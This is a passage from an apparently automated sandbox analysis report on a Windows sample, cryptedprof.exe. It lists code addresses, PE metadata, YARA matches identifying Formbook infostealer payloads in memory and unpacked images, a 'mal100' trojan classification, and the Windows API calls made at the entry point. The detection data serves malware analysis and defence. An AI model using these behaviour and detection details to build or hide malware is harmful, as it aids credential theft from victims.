          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C69E40 | 7_2_02C69E40
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C69E3B | 7_2_02C69E3B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7CFA6 | 7_2_02C7CFA6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C62FB0 | 7_2_02C62FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C62D90 | 7_2_02C62D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0469B150 appears 35 times
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: String function: 00ABB150 appears 121 times
          Source: cryptedprof.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cryptedprof.exe, 00000001.00000003.327029205.0000000002D3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000001.00000002.335855090.00000000028F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.388818719.0000000000D3F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs cryptedprof.exe
          Source: cryptedprof.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@3/3
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, | 1_2_00403486